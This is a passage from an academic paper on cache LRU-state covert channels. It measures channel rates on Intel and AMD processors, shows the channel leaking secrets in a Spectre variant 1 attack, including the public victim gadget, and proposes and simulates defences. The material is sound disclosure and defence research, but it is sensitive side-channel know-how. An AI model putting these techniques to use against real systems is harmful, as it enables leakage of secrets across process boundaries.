LRU Channel with Shared Memory: In Algorithm 1, shared memory is needed between the sender and the receiver processes, e.g., achieved by a shared library. Figure 5 (top) shows the trace observed by the receiver when the sender is sending 0 and 1 alternately. When the sender is sending bit 1, the access time of line 0 observed by the receiver is smaller, as discussed in Section IV-A. Due to the space limit, only the results on the Intel Xeon E5-2690 are shown in Figure 5 (the results on the E3-1245 v5 are in Appendix B). The two processors show similar results, except that they have different thresholds between L1 hit and miss latency, due to different L1 and L2 access latencies. Also, the two processors run at different frequencies, and thus, even with the same t_s, the transmission rate is 480Kbps for the E5-2690 and 580Kbps for the E3-1245 v5.

To evaluate the error rate of the channel, we evaluate the case where the sender process sends a random 128-bit binary string repeatedly. There are 3 types of errors in the channel: 1) bit flips, 2) bit insertions, and 3) bit losses. To evaluate the error rate of the channel, the edit distance between the sent string and the received string is calculated using the Wagner-Fischer algorithm [40]. For each test, the 128-bit string is sent at least 30 times, and the average error of the trials is calculated.
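For reference, a compact C implementation of the Wagner-Fischer edit distance over the sent and received bit strings (our own sketch of the standard algorithm) is:

#include <stdlib.h>
#include <string.h>

static size_t min3(size_t a, size_t b, size_t c) {
    size_t m = a < b ? a : b;
    return m < c ? m : c;
}

/* Edit distance between two '0'/'1' strings: counts flips, insertions, losses. */
size_t edit_distance(const char *sent, const char *recv) {
    size_t n = strlen(sent), m = strlen(recv);
    size_t *prev = malloc((m + 1) * sizeof *prev);
    size_t *cur  = malloc((m + 1) * sizeof *cur);
    for (size_t j = 0; j <= m; j++) prev[j] = j;        /* deletions only */
    for (size_t i = 1; i <= n; i++) {
        cur[0] = i;                                     /* insertions only */
        for (size_t j = 1; j <= m; j++) {
            size_t sub = prev[j - 1] + (sent[i - 1] != recv[j - 1]);
            cur[j] = min3(sub, prev[j] + 1, cur[j - 1] + 1);
        }
        memcpy(prev, cur, (m + 1) * sizeof *prev);
    }
    size_t d = prev[m];
    free(prev); free(cur);
    return d;
}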

The receiver's operations of Algorithm 1 take in total about 560 cycles on both CPUs tested, excluding the sleep and including logging of the results. As shown in Algorithm 3, the receiver then sleeps until t_r cycles have elapsed, so t_r must be larger than this. We therefore evaluate a range of t_r values above 560 cycles. In the sender process, several sending periods t_s are tested. We also test several values of the parameter d; since the processors have 8-way set-associative caches, d is bounded by the associativity.

Figure 4 (top) shows the error rate of the channel versus the transmission rate (i.e., different values of t_s). As shown in the figure, d does not affect the error rate much on the E5-2690. This is because in hyper-threaded sharing the sender process and the receiver process execute in parallel: the sender operation can happen while the receiver is executing any part of its operations, and d only makes the sender operation more likely to fall in the sleep part of the receiver's operations. A larger d gives a slightly better error rate, possibly because there is more interleaving between the two threads and the receiver can observe more of the sender's activity in one measurement. As t_r increases, the error rate increases. In general, the error rate increases as the transmission rate increases (i.e., as t_s decreases). This is because a greater t_s (or a smaller t_r) results in more measurements for each transmitted bit, and the noise can be cancelled out by averaging the measurement results.

LRU Channel without Shared Memory: In Algorithm 2, shared memory is not required between the sender and the receiver processes. Figure 5 (bottom) shows the trace observed by the receiver. When the sender is sending bit 1, the access time of line 0 observed by the receiver is larger, due to the sender's access to the same set, as discussed in Section IV-B.

For Algorithm 2, we evaluate the same ranges of t_r, t_s, and d on both CPU models. Figure 4 (bottom) shows the error rate versus the transmission rate (different values of t_s) on the E5-2690. Compared to the LRU channel with shared memory, the LRU channel without shared memory has more noise. As indicated by the simulation results for Sequence 2 in Section IV-C, with Tree-PLRU, when the sender accesses the set, the receiver may not observe a miss at the end, resulting in a false 0. Also, any access to the same set (by other parts of the programs or other processes on the core) may result in a false 1. However, these errors usually occur consecutively in time, so the receiver can detect such noise by looking for long runs of all 1s or all 0s. We exclude those traces to obtain Figure 4.

For some values of d, the error rate is large on the E5-2690, especially when t_s is large. This may be because the accesses after the sleep make the Tree-PLRU state point to the other side of the subtree, so the receiver does not evict line 0 in the decoding phase. Otherwise, the trend of the error rate is similar to that of the LRU channel with shared memory.

V-B LRU Channels in Time-Sliced Sharing

Fig. 6: Percentage of 1’s observed by the receiver on Intel Xeon E5-2690, when the sender is sending (left) 0 and (right) 1 using Algorithm 1 under time-sliced sharing.

When the sender and receiver share the same core in a time-sliced setting, the two processes still share the same L1 cache. To evaluate the covert channel in the time-sliced sharing setting, we programmed the sender process to always send 1 or always send 0, and the receiver to measure the time of accessing line 0 every t_r cycles.

Figure 6 shows the percentage of 1s received for different t_r and d when the sender is sending 0 or 1 using Algorithm 1 on both CPUs tested. Each data point comes from 1000 measurements.

As shown in Figure 6, with proper parameters, the receiver can distinguish between the sender sending 0 and 1. For example, with a large t_r and a large d, the receiver observes almost 100% 0s when the sender is sending 0, and about 30% 1s when the sender is sending 1, on both Intel processors. The receiver does not observe 1 with a higher probability because, in time-sliced sharing, each process uses the core for a certain period of time: when the receiver monitors the sender in a loop, multiple loop iterations run within one time slice, and only the first iteration reflects the sender's behavior, while the other iterations in that period run without interleaving with the sender. Nevertheless, the receiver can still recognize the message the sender is sending from the percentage of 1s received. Assuming 10 measurements are needed to differentiate a 0 from a 1, the transmission rate is about 2.4 bits per second.

Compared to hyper-threaded sharing, a much larger t_r is needed here for the two threads to interact. However, if t_r is too large, the distinguishability decreases, as other processes might be scheduled during the interval. As shown in Figure 6, a large t_r and a large d give the best distinguishability between the sender sending 0 and 1. This is because when t_r is large, the time spent in the receiver's operations becomes small compared to the sleep time, so the context switch is more likely to happen during the sleep. In Algorithm 1, a bigger d means fewer accesses to the target set after the sleep, and line 0 is then less likely to be evicted in the decoding phase.

We also tried to demonstrate Algorithm 2 in this setting but failed to observe any signal in the measurements. We think the reason is that t_r needs to be large to allow interference between the sender and the receiver, but then any other process running during the interval can pollute the target set and introduce too much noise.

VI LRU Covert Channels in AMD Processors

In this section, we evaluate the characteristics of the LRU covert channel on AMD EPYC 7571 processor on Amazon AWS EC2 platform. The specification of the tested processor is listed in Table III. The methodology of the evaluation is similar to that on Intel processors in Section V.

VI-A Measuring Access Latency on AMD Processors

As shown in Figure 3 in Section IV-D, the latency measured by the rdtscp instruction using the time stamp counter on the AMD processor has a coarser granularity compared to the Intel processors.⁴ Thus, the receiver needs to take multiple repeated measurements and average them to determine whether an access is an L1 hit or not, which lowers the bandwidth of the channel.

⁴There is also the Actual Performance Frequency Clock Count in AMD, but it is only accessible from Ring-0, which does not fit our threat model.

VI-B LRU Channel with Shared Memory

To save power, the AMD L1 cache uses a linear-address-based utag and way-predictor (see Section 2.6.2.2 in [41]). The utag is a hash of the linear address. For a load, while the physical address is being looked up in the TLB, the L1 cache uses the hash of the linear address to match the utag and determine which cache way to use in the cache set. When the physical address becomes available, only that one cache way is looked up instead of all 8 ways. So, when the physical address of a load matches a cache line in the cache but the utag of that way was set by a different linear address, a latency of an L1 miss will be observed (unless the hashes of the two linear addresses collide), even though the physical address matches and the data is in the L1 cache.

This limits our Algorithm 1 across processes with different address spaces. If the sender process accesses line 0, the utag of line 0 will be updated with the linear address of line 0 in the sender's address space. When the receiver then accesses line 0 and measures the time, unless the hashes of the linear addresses of line 0 in the sender's and the receiver's processes collide, the receiver will always observe an L1-miss latency, no matter whether line 0 is in L1 or not. However, the utag hash is not designed for security and may be reverse-engineered.

Fig. 7: Example sequences of the receiver's observations when the sender is sending 0 and 1 alternately using (top) Algorithm 1 and (bottom) Algorithm 2 on AMD EPYC 7571. For Algorithm 1 the transmission rate is 22Kbps, and for Algorithm 2 the transmission rate is 25Kbps. The light blue dotted line shows the moving average.
Fig. 8: Percentage of 1s observed by the receiver on AMD EPYC 7571, when the sender and receiver are sharing a core in a time-sliced setting and the sender is sending (left) 0 and (right) 1 using Algorithm 1.

As long as the sender and the receiver are in the same address space, the LRU channel using Algorithm 1 still exists. For example, it can be used to transfer information when escaping a sandbox in JavaScript [18], and it can be built between program threads in the same address space. Figure 7 (top) shows the trace observed by the receiver when the receiver and the sender are two threads of the same C program running in hyper-threaded sharing. Due to the coarse granularity of the time stamp counter readout on AMD, it is hard to identify the signal from the raw measurements (blue dots). The light blue dotted line in Figure 7 shows the moving average of the latency over 97 measurements, where 97 is the best-fit period of sending one bit for this trace.⁵ When the sender is sending 0 and 1 alternately, the moving average shows a wave-like pattern, meaning the receiver can recover the message from the sender. By measuring the total time taken by the receiver to gather the trace and the period of each bit received, the effective transmission rate is 22Kbps. Due to the coarser granularity of the AMD time stamp counter and the lower clock frequency, the transmission rate of the channel is about one order of magnitude lower than on the Intel processors.

⁵The fact that the period does not match the ratio of the sender's and receiver's periods indicates that the threads do not get scheduled evenly. This might be due to the Amazon EC2 platform, as we observe a similar phenomenon on Intel processors on EC2.

We also tested Algorithm 1 under the time-sliced sharing setting using two threads in the same address space. Figure 8 shows the different results observed by the receiver when the sender is sending 0 and 1. The thresholds used to decide whether a latency represents 0 or 1 are selected to maximize the difference between 0 and 1. As shown in Figure 8, with a large enough t_r, the receiver observes a clearly smaller fraction of 1s when the sender is sending 0 than when the sender is sending 1. This is enough to differentiate 0 and 1, by examining whether the fraction of 1s is below or above a threshold. Assuming 100 measurements are needed to differentiate a 0 from a 1, the transmission rate is about 0.2 bits per second. When t_r increases, more interleaving between the sender thread and the receiver thread happens during each measurement taken by the receiver, and the difference between 0 and 1 becomes greater, indicating less noise. The parameter d does not play a significant role here.

VI-C LRU Channel without Shared Memory

We also tested Algorithm 2 under hyper-threaded sharing on the AMD EPYC 7571. Figure 7 (bottom) shows a trace observed by the receiver when the sender is sending 0 and 1 alternately. The receiver and the sender are two programs (in different memory spaces). Similarly, the light blue dotted line shows the moving average of the latency over 85 measurements, where 85 is the best-fit period, resulting in an effective transmission rate of 25Kbps. When the sender is sending 0 and 1 alternately, the moving average shows a wave-like pattern, meaning the receiver can recover the message from the sender. The measured latencies in Figure 7 (top) and (bottom) are quite different; this might be due to the processor running at a different frequency for power saving at the time of measurement. We did not observe any signal using Algorithm 2 in time-sliced sharing, similar to the case for Intel.

VI-D Comparing the Evaluated LRU Channels

Table IV compares the transmission rates of the channels tested in the different configurations. Hyper-threading gives a much higher transmission rate than time-sliced sharing, because of more interference between the sender and the receiver. Under hyper-threading, Algorithm 1 and Algorithm 2 have similar transmission rates. However, recall that Algorithm 2 is more easily affected by noise due to the activities of other programs, though this noise is easy to filter because the noise activity is usually of a different frequency. The LRU channel on the AMD processor is about one order of magnitude slower than on the Intel processors, due to the coarser granularity of the time stamp counter readout and the lower clock frequency.

Setting          Algorithm     Intel     AMD
Hyper-Threaded   Algorithm 1   500Kbps   20Kbps
Hyper-Threaded   Algorithm 2   500Kbps   20Kbps
Time-Sliced      Algorithm 1   2bps      0.2bps
Time-Sliced      Algorithm 2   --        --
TABLE IV: Transmission rate of the evaluated LRU channels

VII Comparison to Existing Cache Covert Channels

In most of the existing cache side channels, the receiver directly measures whether a certain cache line is in the cache. For example, in the Flush+Reload attack [1], the sender fetches a cache line into the cache, and the receiver measures directly whether that cache line is in the cache. To build such a channel, a cache replacement has to happen due to the sender's access. In contrast, in our LRU cache channel, the sender's operations do not need to cause any cache replacement, because the LRU states are updated on both cache hits and misses. Instead, the cache replacement happens when the receiver measures the LRU state during decoding.

                        F+R (mem)   F+R (L1)   L1 LRU (Alg. 1 & 2)
Intel Xeon E5-2690      336         35         31
Intel Xeon E3-1245 v5   288         40         35
AMD EPYC 7571           232         56         52
TABLE V: Latency of Encoding (cycles)

                              F+R (mem)   F+R (L1)   L1 LRU Alg.1   L1 LRU Alg.2   sender & gcc   sender only
Intel Xeon E5-2690      L1D   0.07%       0.04%      0.03%          0.03%          0.03%          0.01%
                        L2    62%         6.67%      9.59%          15.6%          31%            8.32%
                        LLC   88%         0.77%      0.71%          1.07%          61%            1.46%
Intel Xeon E3-1245 v5   L1D   0.06%       0.02%      0.01%          0.01%          0.01%          0.00%
                        L2    63%         11%        17%            14%            48%            26%
                        LLC   92%         8.12%      8.15%          7.42%          70%            27%
TABLE VI: Cache Miss Rate of the Sender Process

Table V shows the encoding time of the sender. The encoding times in the table include the time to calculate the victim address. For the LRU channels, it is assumed that the victim line is already in the cache before the attack. The LRU channels are compared with Flush+Reload channels. We implemented two Flush+Reload channels: the one denoted F+R (mem) uses the clflush instruction to flush the data all the way down to memory, while F+R (L1) uses eight accesses to the L1 cache set to evict the data from L1. As shown in the table, both LRU channels require less encoding time than the F+R channels. This is because, for the LRU channel, the sender can encode the message with cache hits, while the Flush+Reload channels always require the sender to have cache misses in the target cache level.

Table VI shows the cache miss rate of the sender process. The results are measured with the Linux perf tool using hardware performance counters.⁶ The results show that the sender of LRU Algorithm 1 and Algorithm 2 has a smaller L1 cache miss rate than Flush+Reload. To provide a baseline without an attack, we also show the results when only the sender process runs on the physical core (denoted sender only) and when the sender shares the physical core with a benign workload (denoted sender & gcc). When there is only the sender process, it has the smallest L1 miss rate.⁷ When it shares the core with a benign program, the benign program, e.g., gcc, causes contention in the cache similar to, or even bigger than, the contention due to the receiver in the LRU channel. Hence, if a victim wants to detect potential cache side channel attacks using performance counters [42, 43, 44], the LRU channel is difficult to detect, as it may not be distinguishable from the contention due to benign programs.

⁶We do not have access to the hardware performance counters on the AMD machines on Amazon AWS, so only results from the local Intel machines are shown in Tables VI and VII.

⁷The sender-only case still has a relatively high L2 and LLC miss rate due to fewer references to the L2 and LLC.

Comparing Algorithm 1 with the Flush+Reload attack [1]: both need shared memory, but the LRU channel does not require an explicit flush, and line 0 may stay in the cache the whole time. Comparing Algorithm 2 with the Flush+Reload attack: no shared memory is required. Comparing Algorithm 2 with the Prime+Probe attack [2]: neither requires shared memory, but in Algorithm 2, line N (the line accessed by the sender, which depends on the secret) may stay in the cache the whole time. Moreover, the receiver only needs to measure the time of one memory access in the LRU channel, rather than N cache lines as in the Prime+Probe attack.

VIII LRU Channels in Transient Execution Attacks

                              F+R (mem)   F+R (L1)   L1 LRU Alg.1   L1 LRU Alg.2
Intel Xeon E5-2690      L1D   2.75%       4.73%      4.19%          4.75%
                        L2    7.58%       0.07%      0.11%          0.09%
                        LLC   98.15%      0.87%      0.72%          0.87%
Intel Xeon E3-1245 v5   L1D   2.86%       4.84%      4.13%          4.86%
                        L2    7.39%       0.49%      0.71%          0.45%
                        LLC   91.17%      1.83%      0.74%          0.96%
TABLE VII: Cache Miss Rate of Spectre V1 Attack
Fig. 9: (top) Cache miss rate of L1 Data cache and (bottom) normalized CPI when different cache replacement policies (Tree-PLRU, FIFO, random) are used in the L1 Data cache. The results are normalized with the result of Tree-PLRU policy.

Transient execution attacks leverage transient execution to access a secret and a covert channel to pass the secret to the attacker [18, 19, 20]. Currently, most transient execution attack proof-of-concept code uses the cache Flush+Reload covert channel, e.g., the example code in [18]. Here we demonstrate that our LRU covert channel also works with the Spectre attack to retrieve the secret.

Note that here the secret contains more than 1 bit, and multiple cache sets are used to encode the secret. In practice, 63 cache sets are used (both the Intel and AMD processors tested have 64 sets; the remaining set holds the 7 elements of the pointer chasing structure discussed in Section IV-D). Practical issues such as minimizing noise due to cache prefetchers are discussed in Appendix C.

The Flush+Reload covert channel needs one memory access that depends on the secret as the sender's operation. Meanwhile, as shown in both algorithms in Section IV, the sender's operation in the LRU channels also only needs one memory access whose target set depends on the secret. Thus, the victim code using the LRU channel can be identical to the disclosure gadget of the Flush+Reload channel. Therefore, when demonstrating a transient execution attack using the LRU channels, we take the Spectre variant 1 attack sample code [18], keep the victim (sender) code the same, and change the attacker (receiver) code to use the L1 LRU channels as the disclosure primitive instead. We are able to launch the Spectre attack using the LRU channels (both Algorithm 1 and 2) to observe the secret. Table VII shows the cache miss rate (including both the victim and the attacker) during a Spectre attack.
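For concreteness, the victim (sender) side kept unchanged here is the well-known disclosure gadget from the public Spectre variant 1 proof-of-concept [18]; under misspeculation the single access to array2 already updates the LRU state of one cache set, which is all the LRU receiver needs (array and variable names follow the public PoC):

#include <stdint.h>
#include <stddef.h>

extern size_t  array1_size;
extern uint8_t array1[];
extern uint8_t array2[256 * 512];
extern volatile uint8_t temp;

void victim_function(size_t x) {
    if (x < array1_size) {
        /* Under misspeculation, x can be out of bounds; the access to
           array2 encodes the secret byte into one cache set, and even a
           cache hit there is enough to update that set's LRU state. */
        temp &= array2[array1[x] * 512];
    }
}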

Compared to the Flush+Reload channel, the advantage of the LRU disclosure primitive is the short encoding time (i.e., the sender's operations); thus, a smaller speculation window is required, which may make the attack more dangerous and harder to defend against.

IX Defending the LRU Channels

The LRU timing-based channels leverage the fact that the sender and the receiver share the LRU states in caches. Thus, there could be several approaches to defend the LRU timing-based channels.

IX-A Removing the LRU States

One approach is to use another cache replacement policy instead of LRU or PLRU. In this way, no more LRU state exists, and the channel is removed.

Random Replacement Policy: Random replacement policy does not need any states in the cache. Every time a replacement is needed, a random cache way in the cache set will be evicted.

FIFO Replacement Policy: The First-In First-Out (FIFO, or Round-Robin) replacement policy selects as the victim the oldest cache line fetched into the cache. State is still required to store the history of cache lines fetched into the cache. However, different from LRU, the FIFO state is only updated when a new cache line is brought into the cache on a cache miss. Thus, although the FIFO state contains more information than just which cache lines are present in the cache, the sender behavior that updates it can already be observed by the receiver using existing cache channels.

Performance Evaluation of Random and FIFO Policies: LRU replacement policy is widely used in processors because of its performance. In this section, we evaluate the performance of different replacement policies in the GEM5 simulator [45]. We simulated a single out-of-order CPU core and a memory system with 2-level caches (32KiB 4-way L1I, 64KiB 8-way L1D with a latency of 4 cycles, 2MiB 16-way L2 with a latency of 8 cycles, and main memory latency of 50ns). SPEC 2006 int and float benchmarks were tested [46]. Since we focus on the LRU channels in the L1D cache, we tested different replacement policies in L1D cache.

As shown in Figure 9 (top), compared to Tree-PLRU, the FIFO and Random replacement policies cause only a small overall degradation in the L1D cache miss rate. Depending on the benchmark, the FIFO and Random policies sometimes even have a smaller miss rate than Tree-PLRU. Since an L1 miss can still hit in L2, the overall CPU performance, indicated by cycles per instruction (CPI) in Figure 9 (bottom), changes by less than 2% compared to the baseline. Thus, using a different replacement policy in the L1 cache to mitigate the LRU side and covert channels incurs only a small overhead while increasing security. If the channels in all cache levels are to be mitigated, the replacement policies of all cache levels need to be changed.

IX-B LRU Attack and Secure Caches

Fig. 10: PL cache replacement logic flow-chart. White boxes show the original PL cache design in [24]. Blue boxes show the new PL cache logic added in our simulation to defend against the LRU attack.
Fig. 11: Simulation results for the LRU attack (Algorithm 2) in GEM5 with (top) the original PL cache design and (bottom) the new PL cache design, which locks the LRU state to defend against the LRU attack.

Partitioning: Many secure caches partition the cache lines (tag and data) between the victim and the attacker [23, 24, 25, 26, 47], but the replacement policy and its state are not considered or specified.

For example, in the Partition-Locked (PL) cache [24], each cache line is extended with one lock bit. When a cache line is locked, the line will not be evicted by any cache replacement until it is unlocked, as shown in Figure 10. If a locked line is chosen as the victim to be replaced, the replacement does not happen and the incoming line is handled uncached. However, the LRU state is still updated on accesses to the locked cache line, and the update affects the LRU states of the other lines. We implemented the PL cache with the PLRU replacement algorithm in the GEM5 simulator and tested the LRU attack. During the test, line N (the line accessed by the sender) is first locked by the sender, and Algorithm 2 is used to build a channel. (Algorithm 1 is already protected by the PL cache when line 0 is locked: because line 0 will not be evicted in the decoding phase, the receiver always gets a cache hit no matter what the sender is sending.) As shown in Figure 11 (top), with the original design, the receiver can still receive the secret by observing the timing of accesses to line 0. To mitigate the LRU channel, the LRU state should be locked as well. We add the blue boxes in Figure 10 to the PL cache design. With the new design, the receiver always observes a cache hit, as shown in Figure 11 (bottom). A sketch of the modified update logic is shown below.
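
The following is a minimal sketch of one way to implement the added logic: on an access that hits a locked line, the Tree-PLRU state is simply left unchanged, so locked lines become invisible to the LRU channel. The bit layout, the update convention, and the names (plru_bits, locked, plru_touch) are illustrative assumptions, not the exact GEM5 implementation.

#include <stdint.h>
#include <stdbool.h>

#define WAYS 8            /* 8-way set: 7 Tree-PLRU bits */

typedef struct {
    uint8_t plru_bits;    /* tree bits packed into one byte, root at bit 0 */
    bool    locked[WAYS]; /* PL cache lock bit per cache line */
} pl_set_t;

/* Called on every access that hits in this set. */
void plru_touch(pl_set_t *s, int way) {
    /* Added logic ("blue boxes" in Figure 10): accesses to a locked line
     * do not update the replacement state, so the receiver cannot observe
     * them through the LRU timing channel. */
    if (s->locked[way])
        return;

    /* Original Tree-PLRU update: walk the tree from the root to 'way' and
     * make each bit on the path point away from the subtree containing
     * 'way' (convention here: a set bit means the victim search goes right). */
    int node = 0;
    for (int half = WAYS / 2; half >= 1; half /= 2) {
        bool way_in_right_half = (way & half) != 0;
        if (way_in_right_half)
            s->plru_bits &= (uint8_t)~(1u << node);  /* point victim search left */
        else
            s->plru_bits |= (uint8_t)(1u << node);   /* point victim search right */
        node = 2 * node + 1 + (way_in_right_half ? 1 : 0);
    }
}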

DAWG [28] proposes to partition both the cache ways and the Tree-PLRU state of a cache set between protection domains. We are unaware of any other designs that partition the LRU states.

For transient execution cache side-channel attacks, one solution, proposed in InvisiSpec [32], is to update micro-architectural state (including the LRU state) only after the access is no longer speculative.

There are also software partitioning schemes, for example, using “page coloring” to map different processes to different cache sets to partition the cache [47]. However, the L1 cache is small: with 64-byte lines and 64 sets, the set index is determined entirely by the page offset bits, so every 4KiB page maps to all L1 sets and partitioning of the L1 cache cannot be achieved by partitioning addresses at the granularity of a page.

Randomization: Other secure cache designs mitigate cache channels by adding randomness to the logic. For example, the Random Fill cache [29] decouples the access from the cache line brought into the cache by fetching a random cache line instead of the line being accessed. However, if the accessed line is already in the cache, the replacement state is still updated on the cache hit, and the LRU channel could still work.

Some secure cache designs randomize the mapping between addresses and cache sets, such as Newcache, the RP cache, and the CEASER cache [24, 30, 48], so that the receiver (and the sender) cannot map addresses to the target cache set to build a channel.

X Related Work

Most cache timing channels leverage the tag array. The Flush+Reload attack [1] transfers information by reusing the same data in the cache. There are other reuse-based cache side-channel attacks, such as the Cache Collision attack [3]. The Prime+Probe attack [2], on the other hand, transfers information by creating contention in the cache. Another example of a contention-based side channel is the Evict+Time attack [2].

Shared cache components other than the tag array have also been leveraged for side and covert channels. For example, contention in the cache directory of non-inclusive caches has been demonstrated and used for a side-channel attack [5]. Cache coherence states have also been used to create covert channels [6, 49].

In parallel to this work, a recent arXiv preprint [39] presents side channels that leverage the replacement policy in the LLC, where shared memory is required. In contrast, we demonstrate the LRU channels both with and without shared memory. Their attack also relies on the clflush instruction, and their flush operation cannot be replaced by a series of memory accesses (as we do in our attack), which makes their attack impractical in settings where clflush is not available, e.g., in JavaScript. Further, the L1 cache is directly accessed by the processor pipeline, and local cache accesses (L1 hits) do not update the LLC replacement state used in [39], so our attack is more stealthy and LLC defenses do not stop the L1 LRU channel.

Due to the threat of the various timing channels, many secure cache designs have been proposed in the literature to defend against the attacks [23, 24, 25, 26, 27, 28, 47], as already discussed in Section IX-B. However, most did not consider LRU attacks and cannot defend against them.

Another approach is to use hardware performance counters to detect potential cache side-channel attacks in real time [42, 43, 44], based on the observation that the root cause of existing cache side channels is cache misses. However, the LRU channels work with either hits or misses for the sender, so counting only the sender’s cache misses will not detect the attack.

XI Conclusion

In this paper, we presented novel timing-based channels leveraging the cache LRU replacement states. We designed two protocols to transfer information between processes using the LRU states, both when there is shared memory between the sender and the receiver and when there is no shared memory. We also demonstrated the LRU channels on real-world commercial processors. The LRU channels require only an access (cache hit or miss) from the sender, while all existing known timing-based cache side and covert channels require the sender to trigger a cache replacement (a cache miss). Thus, the LRU channel has a shorter encoding time, a lower cache miss rate for the sender, and requires a smaller speculation window in transient execution attack scenarios. We showed that the new LRU channels also affect current secure cache designs. Finally, we proposed several methods to mitigate the LRU channels and evaluated them, including a modified design of the secure PL cache.

Responsible Disclosure: We have informed Intel and AMD of our findings on March 6th, 2019, and they have acknowledged the receipt of the information.

Acknowledgment

We would like to thank the authors of InvisiSpec [32], especially Mengjia Yan, for their open-source code and scripts. Special thanks to Linbo Shao for helping with the PL cache implementation in GEM5. Thanks to Amazon for their cloud research credits that we used to run some of our experiments and benchmarks on their EC2 platform. This work was supported by NSF grants 1651945 and 1813797, and through SRC award number 2844.001.

References

  • [1] Y. Yarom and K. Falkner, “Flush+Reload: A high resolution, low noise, L3 cache side-channel attack,” in USENIX Security Symposium, 2014.
  • [2] D. A. Osvik, A. Shamir, and E. Tromer, “Cache attacks and countermeasures: the case of AES,” in Cryptographers’ Track at the RSA Conference.   Springer, 2006.
  • [3] J. Bonneau and I. Mironov, “Cache-collision timing attacks against AES,” in International Workshop on Cryptographic Hardware and Embedded Systems.   Springer, 2006.
  • [4] F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee, “Last-level cache side-channel attacks are practical,” in Security and Privacy (SP), 2015 IEEE Symposium on.   IEEE, 2015.
  • [5] M. Yan, R. Sprabery, B. Gopireddy, C. Fletcher, R. Campbell, and J. Torrellas, “Attack directories, not caches: Side channel attacks in a non-inclusive world,” in 2019 IEEE Symposium on Security and Privacy (SP).   IEEE, 2019.
  • [6] F. Yao, M. Doroslovacki, and G. Venkataramani, “Are Coherence Protocol States Vulnerable to Information Leakage?” in High Performance Computer Architecture (HPCA), 2018 IEEE International Symposium on.   IEEE, 2018.
  • [7] Z. Wang and R. B. Lee, “Covert and side channels due to processor architecture,” in Computer Security Applications Conference, 2006. ACSAC’06. 22nd Annual.   IEEE, 2006.
  • [8] M. Schwarz, M. Schwarzl, M. Lipp, and D. Gruss, “Netspectre: Read arbitrary memory over network,” arXiv preprint arXiv:1807.10535, 2018.
  • [9] A. Moghimi, T. Eisenbarth, and B. Sunar, “Memjam: A false dependency attack against constant-time crypto implementations in sgx,” in Cryptographers’ Track at the RSA Conference.   Springer, 2018.
  • [10] A. C. Aldaya, B. B. Brumley, S. ul Hassan, C. P. García, and N. Tuveri, “Port contention for fun and profit,” in 2019 IEEE Symposium on Security and Privacy (SP).   IEEE, 2019.
  • [11] A. Bhattacharyya, A. Sandulescu, M. Neugschwandtner, A. Sorniotti, B. Falsafi, M. Payer, and A. Kurmus, “Smotherspectre: exploiting speculative execution through port contention,” arXiv preprint arXiv:1903.01843, 2019.
  • [12] D. Evtyushkin, R. Riley, N. C. Abu-Ghazaleh, D. Ponomarev et al., “Branchscope: A new side-channel attack on directional branch predictor,” in ACM SIGPLAN Notices, vol. 53, no. 2.   ACM, 2018.
  • [13] D. Evtyushkin, D. Ponomarev, and N. Abu-Ghazaleh, “Jump over aslr: Attacking branch predictors to bypass aslr,” in The 49th Annual IEEE/ACM International Symposium on Microarchitecture.   IEEE Press, 2016.
  • [14] D. Gullasch, E. Bangerter, and S. Krenn, “Cache games–Bringing access-based cache attacks on AES to practice,” in Security and Privacy (SP), 2011 IEEE Symposium on.   IEEE, 2011.
  • [15] C. Percival, “Cache missing for fun and profit,” 2005.
  • [16] D. J. Bernstein, “Cache-timing attacks on AES,” 2005.
  • [17] O. Acıiçmez and Ç. K. Koç, “Trace-driven cache attacks on AES (short paper),” in International Conference on Information and Communications Security.   Springer, 2006.
  • [18] P. Kocher, J. Horn, A. Fogh, D. Genkin, D. Gruss, W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher, M. Schwarz, and Y. Yarom, “Spectre attacks: Exploiting speculative execution,” in 40th IEEE Symposium on Security and Privacy (S&P’19), 2019.
  • [19] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, and M. Hamburg, “Meltdown: Reading kernel memory from user space,” in 27th USENIX Security Symposium (USENIX Security 18), 2018.
  • [20] C. Canella, J. Van Bulck, M. Schwarz, M. Lipp, B. von Berg, P. Ortner, F. Piessens, D. Evtyushkin, and D. Gruss, “A Systematic Evaluation of Transient Execution Attacks and Defenses,” arXiv preprint arXiv:1811.05441, 2018.
  • [21] K. So and R. N. Rechtschaffen, “Cache operations by mru change,” IEEE Transactions on Computers, vol. 37, 1988.
  • [22] A. Malamy, R. N. Patel, and N. M. Hayes, “Methods and apparatus for implementing a pseudo-lru cache memory replacement scheme with a locking feature,” US Patent 5,353,425, Oct. 4, 1994.
  • [23] R. B. Lee, P. Kwan, J. P. McGregor, J. Dwoskin, and Z. Wang, “Architecture for protecting critical secrets in microprocessors,” in ACM SIGARCH Computer Architecture News, vol. 33, no. 2.   IEEE Computer Society, 2005.
  • [24] Z. Wang and R. B. Lee, “New cache designs for thwarting software cache-based side channel attacks,” in ACM SIGARCH Computer Architecture News, vol. 35, no. 2.   ACM, 2007.
  • [25] L. Domnitser, A. Jaleel, J. Loew, N. Abu-Ghazaleh, and D. Ponomarev, “Non-monopolizable caches: Low-complexity mitigation of cache side channel attacks,” ACM Transactions on Architecture and Code Optimization (TACO), vol. 8, 2012.
  • [26] D. Zhang, A. Askarov, and A. C. Myers, “Language-based control and mitigation of timing channels,” ACM SIGPLAN Notices, vol. 47, 2012.
  • [27] M. Yan, B. Gopireddy, T. Shull, and J. Torrellas, “Secure Hierarchy-Aware Cache Replacement Policy (SHARP): Defending Against Cache-Based Side Channel Attacks,” in Proceedings of the 44th Annual International Symposium on Computer Architecture.   ACM, 2017.
  • [28] V. Kiriansky, I. Lebedev, S. Amarasinghe, S. Devadas, and J. Emer, “DAWG: A defense against cache timing attacks in speculative execution processors,” in 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO).   IEEE, 2018.
  • [29] F. Liu and R. B. Lee, “Random fill cache architecture,” in Microarchitecture (MICRO), 2014 47th Annual IEEE/ACM International Symposium on.   IEEE, 2014.
  • [30] F. Liu, H. Wu, K. Mai, and R. B. Lee, “Newcache: Secure cache architecture thwarting cache side-channel attacks,” IEEE Micro, vol. 36, 2016.
  • [31] G. Keramidas, A. Antonopoulos, D. N. Serpanos, and S. Kaxiras, “Non deterministic caches: A simple and effective defense against side channel attacks,” Design Automation for Embedded Systems, vol. 12, 2008.
